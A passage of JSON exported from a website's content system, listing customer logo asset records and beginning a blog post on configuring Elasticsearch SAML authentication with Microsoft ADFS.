District","updated_at":"2022-05-12T21:57:16.429Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:26.483Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blta4af3ad2ac3c3183","ACL":{},"alt_text_l10n":"BulbAmerica","created_at":"2022-05-12T21:57:16.253Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: BulbAmerica","updated_at":"2022-05-12T21:57:16.253Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:51.673Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt485687ae13b195d4","ACL":{},"alt_text_l10n":"Builtón","created_at":"2022-05-12T21:57:16.079Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Builtón","updated_at":"2022-05-12T21:57:16.079Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:19.145Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt4377f94ab453f551","ACL":{},"alt_text_l10n":"Brolly","created_at":"2022-05-12T21:57:15.893Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Brolly","updated_at":"2022-05-12T21:57:15.893Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:19.082Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt37b9a3c07ffd3720","ACL":{},"alt_text_l10n":"Broaderbiz","created_at":"2022-05-12T21:57:15.699Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Broaderbiz","updated_at":"2022-05-12T21:57:15.699Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:10.681Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt709029231c67f216","ACL":{},"alt_text_l10n":"BPCE","created_at":"2022-05-12T21:57:15.516Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: BPCE","updated_at":"2022-05-12T21:57:15.516Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:37.298Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blte7e9d2f9abbc46b7","ACL":{},"alt_text_l10n":"Box","created_at":"2022-05-12T21:57:15.332Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Box","updated_at":"2022-05-12T21:57:15.332Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:17.979Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltafb6f5a7c73517cb","ACL":{},"alt_text_l10n":"BNP Paribas","created_at":"2022-05-12T21:57:15.153Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: BNP Paribas","updated_at":"2022-05-12T21:57:15.153Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:02.537Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltb540438bbf4d409f","ACL":{},"alt_text_l10n":"BMW","created_at":"2022-05-12T21:57:14.980Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: BMW","updated_at":"2022-05-12T21:57:14.980Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:02.563Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blte35818ea37d72c17","ACL":{},"alt_text_l10n":"Blizzard","created_at":"2022-05-12T21:57:14.794Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Blizzard","updated_at":"2022-05-12T21:57:14.794Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:17.919Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltc85fdfe39b77a46b","ACL":{},"alt_text_l10n":"Blackboard","created_at":"2022-05-12T21:57:14.591Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Blackboard","updated_at":"2022-05-12T21:57:14.591Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:09.905Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt85654053179804f2","ACL":{},"alt_text_l10n":"Bell Canada","created_at":"2022-05-12T21:57:14.402Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Bell Canada","updated_at":"2022-05-12T21:57:14.402Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:44.962Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt04c206a2d77e2285","ACL":{},"alt_text_l10n":"BBC","created_at":"2022-05-12T21:57:14.217Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: BBC","updated_at":"2022-05-12T21:57:14.217Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:28:53.030Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt46b48334c1d6c20d","ACL":{},"alt_text_l10n":"Bayer AG","created_at":"2022-05-12T21:57:13.999Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Bayer AG","updated_at":"2022-05-12T21:57:13.999Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:19.128Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt636f03b12f2bb3b3","ACL":{},"alt_text_l10n":"Bankwest","created_at":"2022-05-12T21:57:13.810Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Bankwest","updated_at":"2022-05-12T21:57:13.810Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:26.561Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt1b3ccf9eb3002a02","ACL":{},"alt_text_l10n":"BAI Communications","created_at":"2022-05-12T21:57:13.632Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: BAI Communications","updated_at":"2022-05-12T21:57:13.632Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:02.261Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltff7d14eebe21b05e","ACL":{},"alt_text_l10n":"BAI Canada","created_at":"2022-05-12T21:57:13.447Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: BAI Canada","updated_at":"2022-05-12T21:57:13.447Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:23.876Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt0c13e25327497cbb","ACL":{},"alt_text_l10n":"Azusa Pacific University","created_at":"2022-05-12T21:57:13.253Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Azusa Pacific University","updated_at":"2022-05-12T21:57:13.253Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:28:53.111Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt15d10999daa2ed8b","ACL":{},"alt_text_l10n":"AXA","created_at":"2022-05-12T21:57:13.054Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: AXA","updated_at":"2022-05-12T21:57:13.054Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:28:53.209Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt55ab8e95f71a5f34","ACL":{},"alt_text_l10n":"AutoScout24","created_at":"2022-05-12T21:57:12.863Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: AutoScout24","updated_at":"2022-05-12T21:57:12.863Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:26.393Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blta8dbc4948d248385","ACL":{},"alt_text_l10n":"Autopilot","created_at":"2022-05-12T21:57:12.685Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Autopilot","updated_at":"2022-05-12T21:57:12.685Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:51.715Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt386af3ac08b15991","ACL":{},"alt_text_l10n":"Audi","created_at":"2022-05-12T21:57:12.500Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Audi","updated_at":"2022-05-12T21:57:12.500Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:18.999Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltde3c1eebe9ad8d75","ACL":{},"alt_text_l10n":"Auchan","created_at":"2022-05-12T21:57:12.323Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Auchan","updated_at":"2022-05-12T21:57:12.323Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:17.888Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt61a9adf7a1aab195","ACL":{},"alt_text_l10n":"Asian Food Network","created_at":"2022-05-12T21:57:12.147Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Asian Food Network","updated_at":"2022-05-12T21:57:12.147Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:26.543Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt931f215db4b59ccb","ACL":{},"alt_text_l10n":"Asana","created_at":"2022-05-12T21:57:11.963Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Asana","updated_at":"2022-05-12T21:57:11.963Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:45.132Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt5d64e6e409dc810c","ACL":{},"alt_text_l10n":"Argos","created_at":"2022-05-12T21:57:11.771Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Argos","updated_at":"2022-05-12T21:57:11.771Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:26.455Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltfcb527a0f1c9c706","ACL":{},"alt_text_l10n":"Amadeus","created_at":"2022-05-12T21:57:11.589Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Amadeus","updated_at":"2022-05-12T21:57:11.589Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:23.846Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt7395586303b839e1","ACL":{},"alt_text_l10n":"Albert Heijn","created_at":"2022-05-12T21:57:11.400Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Albert Heijn","updated_at":"2022-05-12T21:57:11.400Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:37.347Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt436c743cba2a1055","ACL":{},"alt_text_l10n":"Airbus","created_at":"2022-05-12T21:57:11.210Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Airbus","updated_at":"2022-05-12T21:57:11.210Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:19.074Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt8eb07a7b73362111","ACL":{},"alt_text_l10n":"Aginic","created_at":"2022-05-12T21:57:11.024Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Aginic","updated_at":"2022-05-12T21:57:11.024Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:45.085Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt9ae02cf3417e4758","ACL":{},"alt_text_l10n":"Adobe","created_at":"2022-05-12T21:57:10.804Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Adobe","updated_at":"2022-05-12T21:57:10.804Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:51.587Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltf7320970545338ed","ACL":{},"alt_text_l10n":"Acuris","created_at":"2022-05-12T21:57:10.605Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Acuris","updated_at":"2022-05-12T21:57:10.605Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:23.793Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt53f2913cbc90ba00","ACL":{},"alt_text_l10n":"Activision","created_at":"2022-05-12T21:57:10.393Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Activision","updated_at":"2022-05-12T21:57:10.393Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:19.220Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltff00d74491dc28fe","ACL":{},"alt_text_l10n":"Achmea","created_at":"2022-05-12T21:57:10.206Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: Achmea","updated_at":"2022-05-12T21:57:10.206Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:30:23.869Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"blt8b6181c39233bbf8","ACL":{},"alt_text_l10n":"11 Street","created_at":"2022-05-12T21:57:09.968Z","created_by":"blt36e890d06c5ec32c","tags":[],"title":"Customer: 11 Street","updated_at":"2022-05-12T21:57:09.968Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T22:29:45.028Z","user":"blt36e890d06c5ec32c"}},{"_version":2,"locale":"en-us","uid":"blt403fcb9d8bef2f46","ACL":{},"alt_text_l10n":"Accenture","created_at":"2022-05-02T23:19:23.213Z","created_by":"blt36e890d06c5ec32c","file":null,"tags":[],"title":"Customer: Accenture","updated_at":"2022-05-12T21:47:24.400Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T21:47:36.797Z","user":"blt36e890d06c5ec32c"}},{"_version":2,"locale":"en-us","uid":"blt8ea9cb7b1a5037c3","ACL":{},"alt_text_l10n":"Walmart Technology","created_at":"2022-05-02T23:19:22.836Z","created_by":"blt36e890d06c5ec32c","file":null,"tags":[],"title":"Customer: Walmart Technology","updated_at":"2022-05-12T21:47:01.930Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T21:47:36.809Z","user":"blt36e890d06c5ec32c"}},{"_version":2,"locale":"en-us","uid":"blt7cd2eb6ff7674511","ACL":{},"alt_text_l10n":"Barclays","created_at":"2022-05-02T23:19:23.027Z","created_by":"blt36e890d06c5ec32c","file":null,"tags":[],"title":"Customer: Barclays","updated_at":"2022-05-12T21:46:58.490Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T21:47:36.820Z","user":"blt36e890d06c5ec32c"}},{"_version":2,"locale":"en-us","uid":"bltcbcd7d1617610b47","ACL":{},"alt_text_l10n":"U.S. Department of Defense","created_at":"2022-05-02T23:19:23.405Z","created_by":"blt36e890d06c5ec32c","file":null,"tags":[],"title":"Customer: U.S. Department of Defense","updated_at":"2022-05-12T21:46:44.810Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T21:47:36.833Z","user":"blt36e890d06c5ec32c"}},{"_version":2,"locale":"en-us","uid":"bltd336b041dee3d8a9","ACL":{},"alt_text_l10n":"Air Force Mission Defense Teams","created_at":"2022-05-02T23:19:23.595Z","created_by":"blt36e890d06c5ec32c","file":null,"tags":[],"title":"Customer: Air Force Mission Defense Teams","updated_at":"2022-05-12T21:46:15.144Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T21:47:36.844Z","user":"blt36e890d06c5ec32c"}},{"_version":2,"locale":"en-us","uid":"blt998fd1d1b1b796c4","ACL":{},"alt_text_l10n":"Ricoh","created_at":"2022-05-02T23:19:22.641Z","created_by":"blt36e890d06c5ec32c","file":null,"tags":[],"title":"Customer: Ricoh","updated_at":"2022-05-12T21:45:49.498Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T21:47:36.861Z","user":"blt36e890d06c5ec32c"}},{"_version":2,"locale":"en-us","uid":"blt382da83ade79fb34","ACL":{},"alt_text_l10n":"U.S. Air Force","created_at":"2022-05-02T23:19:22.451Z","created_by":"blt36e890d06c5ec32c","file":null,"tags":[],"title":"Customer: U.S. Air Force","updated_at":"2022-05-12T21:45:46.174Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T21:47:36.875Z","user":"blt36e890d06c5ec32c"}},{"_version":2,"locale":"en-us","uid":"bltaf56ebc9f2d1fe5f","ACL":{},"alt_text_l10n":"Volkswagon","created_at":"2022-05-02T23:19:22.245Z","created_by":"blt36e890d06c5ec32c","file":null,"tags":[],"title":"Customer: Volkswagon","updated_at":"2022-05-12T21:45:42.535Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T21:47:36.887Z","user":"blt36e890d06c5ec32c"}},{"_version":3,"locale":"en-us","uid":"bltc8f2519ccfc962b7","ACL":{},"alt_text_l10n":"Indiana University","created_at":"2022-05-02T23:19:23.788Z","created_by":"blt36e890d06c5ec32c","file":null,"tags":[],"title":"Customer: Indiana University","updated_at":"2022-05-12T21:45:24.150Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T21:47:36.901Z","user":"blt36e890d06c5ec32c"}},{"_version":3,"locale":"en-us","uid":"blt39c3aa1b28dd2d91","ACL":{},"alt_text_l10n":"Application Performance Monitoring charts and graphs","created_at":"2022-03-18T21:02:28.349Z","created_by":"blt36e890d06c5ec32c","file":"blt8f7cd5151ef586ed","tags":[],"title":"Application Performance Monitoring charts and graphs","updated_at":"2022-04-01T19:07:18.369Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-04-01T19:07:31.659Z","user":"blt36e890d06c5ec32c"}},{"_version":1,"locale":"en-us","uid":"bltb1647f200956d5b9","ACL":{},"alt_text_l10n":"Elastic","created_at":"2022-03-22T18:19:39.827Z","created_by":"blt36e890d06c5ec32c","file":null,"tags":[],"title":"Elastic logo","updated_at":"2022-03-22T18:19:39.827Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-03-22T18:20:04.165Z","user":"blt36e890d06c5ec32c"}}]],"blogEntries":[[{"uid":"blt3184d91d733b9d10","_version":17,"locale":"en-us","ACL":{},"abstract_l10n":"Find out how to configure Elasticsearch SAML authentication in environments using Microsoft Active Directory Federation Services (ADFS).","author":["blte99ecbbc2b5c80fb"],"body_l10n":"\u003cp\u003eThis blog post provides instructions for configuration of Elasticsearch SAML authentication in environments where Microsoft Active Directory Federation Services (ADFS) is used as an identity provider (IdP) for an Elasticsearch SAML realm. The main purpose is to establish a working solution, which can be taken as a baseline for more advanced configurations that depend on use case–specific requirements. Additional configuration options that are not discussed in this blog post are available in \u003ca href=\"/guide/en/elasticsearch/reference/current/configuring-saml-realm.html\"\u003eElasticsearch SAML guide\u003c/a\u003e, \u003ca href=\"/guide/en/cloud/current/ec-securing-clusters-SAML.html\"\u003eElasticsearch Service SAML documentation\u003c/a\u003e, and \u003ca href=\"/guide/en/cloud-enterprise/current/ece-securing-clusters-SAML.html\"\u003eElastic Cloud Enterprise SAML documentation\u003c/a\u003e.\u003c/p\u003e\u003ch3\u003e\u003cstrong\u003ePrerequisites:\u003c/strong\u003e\u003c/h3\u003e\u003cul\u003e\u003cli\u003eElasticsearch cluster with at least 1 node and Kibana\u003c/li\u003e\u003cli\u003eWindows Server 2016, 2019, 2022\u003c/li\u003e\u003cli\u003eActive Directory Domain Services (AD DS)\u003c/li\u003e\u003cli\u003eActive Directory Federation Services (ADFS)\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eFor the purposes of this blog, the following configuration was used:\u003c/p\u003e\u003cul\u003e\u003cli\u003eKibana URL: \u003cspan style='font-size: 11pt;'\u003ehttps://kibana.example.com\u003c/span\u003e\u003c/li\u003e\u003cli\u003eADFS FQDN: adfs.saml.lab\u003c/li\u003e\u003cli\u003eDomain: saml.lab\u003c/li\u003e\u003cli\u003eAD groups: kibana_user, superuser\u003c/li\u003e\u003cli\u003eUser 1 (member of ad_kibana_users_group group): es_user1@saml.lab\u003c/li\u003e\u003cli\u003eUser 2 (member of ad_superusers_group group): es_user2@saml.lab\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltfba8626cff944571/5dc0807ba85dd3382954ef74/saml-adfs-users-1-blog.jpg\" data-sys-asset-uid=\"bltfba8626cff944571\" alt=\"AD users and computers\"/\u003e\u003c/h4\u003e\u003ch3\u003e\u003cstrong\u003eConfiguring the SAML realm in elasticsearch.yml\u003c/strong\u003e\u003c/h3\u003e\u003cp\u003eTo configure the SAML realm, you will open Elasticsearch.yml file in an editor, add the following configuration on all the ES nodes, and restart them. If Elasticsearch Service is used, you would update Elasticsearch node user overrides configuration as per \u003ca href=\"/guide/en/cloud/current/ec-securing-clusters-SAML.html#ec-securing-clusters-SAML\"\u003ethis documentation page\u003c/a\u003e.\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003e\u003cspan style='font-size: 11pt;'\u003expack.security.authc.realms.saml.saml-adfs:\u003c/span\u003e\u003cbr /\u003e\u003cspan style='font-size: 11pt;'\u003e\u0026nbsp;\u0026nbsp;order: 2\u003c/span\u003e \u003cbr /\u003e \u003cspan style='font-size: 11pt;'\u003eidp.metadata.path: metadata/FederationMetadata.xml\u003c/span\u003e\u003cbr /\u003e \u003cspan style='font-size: 11pt;'\u003eidp.entity_id: \"https://adfs.saml.lab/adfs/services/trust\"\u003c/span\u003e\u003cbr /\u003e\u003cspan style='font-size: 11pt;'\u003e\u0026nbsp;\u0026nbsp;sp.entity_id:\u0026nbsp; \"https://kibana.example.com/\"\u003c/span\u003e\u003cbr /\u003e\u003cspan style='font-size: 11pt;'\u003e\u0026nbsp;\u0026nbsp;sp.acs: \"https://kibana.example.com/api/security/saml/callback\"\u003c/span\u003e\u003cbr /\u003e\u003cspan style='font-size: 11pt;'\u003e\u0026nbsp;\u0026nbsp;sp.logout: \"https://kibana.example.com/logout\"\u003c/span\u003e\u003cbr /\u003e\u003cspan style='font-size: 11pt;'\u003e\u0026nbsp;\u0026nbsp;attributes.principal:\u003c/span\u003e\u003cbr /\u003e\u003cspan style='font-size: 11pt;'\u003e\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn\"\u003c/span\u003e \u003cbr /\u003e \u003cspan style='font-size: 11pt;'\u003e\u0026nbsp;\u0026nbsp;attributes.groups: \"http://schemas.xmlsoap.org/claims/Group\"\u003c/span\u003e\u003cbr /\u003e\u003cspan style='font-size: 11pt;'\u003e\u0026nbsp;\u0026nbsp;nameid_format:\u003c/span\u003e\u003cbr /\u003e\u003cspan style='font-size: 11pt;'\u003e\"urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified\"\u003c/span\u003e\u003c/pre\u003e\u003cp\u003eConfigurations specifics:\u003c/p\u003e\u003cp\u003eidp.metadata.path references the location where the SAML metadata of the IdP (FederationMetadata.xml in this example) is accessible. There are two ways of providing the SAML metadata of the IdP to Elasticsearch: one by uploading the metadata file to all the nodes (in Elasticsearch Service you use a bundle as described \u003ca href=\"/guide/en/cloud/current/ec-securing-clusters-SAML.html\"\u003ehere\u003c/a\u003e) into a folder that Elasticsearch process can access, or by specifying an https URL where metadata is accessible.\u003c/p\u003e\u003cp\u003eidp.entity_id is the EntityID of the SAML IIdP, as it is also specified in the IdP metadata file.\u003c/p\u003e\u003cp\u003eSp.entity_id is the SAML EntityID, a string that will identify this service provider (SP). Entity IDs are matched as strings and not as canonicalized URLs, so things like trailing slashes and port numbers matter. Note that the SP EntityID is only an identifier and will never need to be resolved or accessed as a URL.\u003c/p\u003e\u003cp\u003esp.acs: The \u003cem\u003eAssertion Consumer Service\u003c/em\u003e (ACS) endpoint is the URL within Kibana that accepts authentication messages. This ACS endpoint supports the SAML HTTP-POST binding only. It must be a URL that is accessible from the web browser of the user who is attempting to log in to Kibana; it does not need to be directly accessible by Elasticsearch or the IdP.\u003c/p\u003e\u003cp\u003eSp.logout must be configured as the URL in Kibana that accepts logout messages. Please note that configuring SAML logging will require certificate configuration to sign SAML messages. Configuring certificates and message signing is out of scope for this blog post, but detailed configuration is available on \u003ca href=\"/guide/en/elasticsearch/reference/6.7/saml-guide-authentication.html#saml-enc-sign\"\u003ethis documentation page\u003c/a\u003e.\u003c/p\u003e\u003cp\u003eAttributes.principaldefines which attribute from the attribute statement of the SAML response that the IdP sends, and should be mapped and used as the user principal in Elasticsearch and Kibana. For the purpose of this blog post, you will describe how UPN or the SAML NameID with persistent format can be mapped. More information on attribute mapping for the SAML realm is available \u003ca href=\"/guide/en/elasticsearch/reference/current/saml-guide-authentication.html#saml-attribute-mapping\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\u003cp\u003eattributes.groups defines which attribute from the attribute atatement of the SAML response that the IdP sends, and should be mapped as the groups property of the user in Elasticsearch and Kibana. The mapped values can then be used to assign roles to specific users.\u003c/p\u003e\u003cp\u003enameid_format defines the NameID format that Elasticsearch will request from ADFS when sending the SAML authentication request at the beginning of the SAML SSO flow. The value is important, because if ADFS is not correctly configured to “release” a NameID with the same format, the authentication will fail. If you don’t plan to use a persistent NameID, you can leave this setting to\u003c/p\u003e\u003cp\u003eurn:oasis:names:tc:SAML:1.1:nameid-format:unspecified is the default format that ADFS supports. If you want to use a persistent Name ID, then set the value to urn:oasis:names:tc:SAML:2.0:nameid-format:persistent and complete the extra configuration step in \"Step 2: Configure ADFS claims\" below.\u003c/p\u003e\u003ch3\u003e\u003cstrong\u003eConfiguring the SAML realm in kibana.yml\u003c/strong\u003e\u003c/h3\u003e\u003cp\u003e\u003cspan style='font-size: 11pt;'\u003eIn Kibana we need to configure the login selector and add the newly configured SAML realm. To ensure you can login with normal users in case there is an issue with SAML, we also add support for the basic authentication provider to the config added to kibana.yml. \u0026nbsp; If Elasticsearch Service is used, we would update Kibana nodes user overrides configuration as per \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-securing-clusters-SAML.html#ec-securing-clusters-SAML\"\u003e\u003cspan style='font-size: 11pt;'\u003ethis documentation page\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 11pt;'\u003e.\u003c/span\u003e.\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003e\u003cspan style='font-size: 11pt;'\u003e\u0026nbsp;xpack.security.authc.providers:\u003c/span\u003e \u003cbr /\u003e\u003cspan style='font-size: 